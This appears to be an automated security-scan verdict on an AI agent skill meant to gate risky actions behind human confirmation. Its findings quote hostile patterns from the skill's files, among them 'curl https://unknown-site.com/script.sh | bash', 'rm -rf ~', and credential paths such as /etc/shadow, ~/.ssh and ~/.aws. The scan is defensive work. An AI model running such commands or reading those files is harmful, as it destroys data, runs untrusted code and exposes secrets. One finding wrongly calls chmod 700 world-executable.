ClawAudit verdict
claw-gatekeeper
This is a security control skill that intercepts risky operations and requires human confirmation; it acts as a safety layer and the credential_store capability is for tracking session approvals, not for accessing or sending secrets.
⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.
Automated static analysis — not a human review. ClawAudit flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
Findings (14)
Recursive delete from root or home — destructive command
SKILL.md · code · rm -rf ~
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
references/user_guide.md · code · curl https://unknown-site.com/script.sh | bash
Pipe to bash — executes piped content as shell commands
references/user_guide.md · code · | bash
Pipe to sh — executes piped content as shell commands
references/user_guide.md · code · | sh
Accesses sensitive system files
SKILL.md · prose · downgraded · /etc/shadow
Accesses .ssh directory
references/user_guide.md · code · .ssh/
Pipe-to-shell pattern (wget | sh)
config/config.hardened.json · prose · downgraded · wget .* | sh
Accesses cloud provider credentials
SECURITY.md · code · ~/.aws
Accesses Azure credentials directory
references/risk_matrix.md · prose · downgraded · ~/.azure
Accesses shell history/config
config/config.hardened.json · prose · downgraded · ~/.bash_history
References sudo — requests elevated privileges
references/risk_matrix.md · prose · downgraded · Sudo
Sets world-executable permissions
SECURITY.md · code · chmod 700
Instructs covert action — may act without user awareness
references/user_guide.md · prose · downgraded · silently
Changes file ownership
config/config.hardened.json · prose · downgraded · chown
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/B). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
No declared permissions — minimal attack surface.
credential_store Is this flag fair?
Thanks — recorded.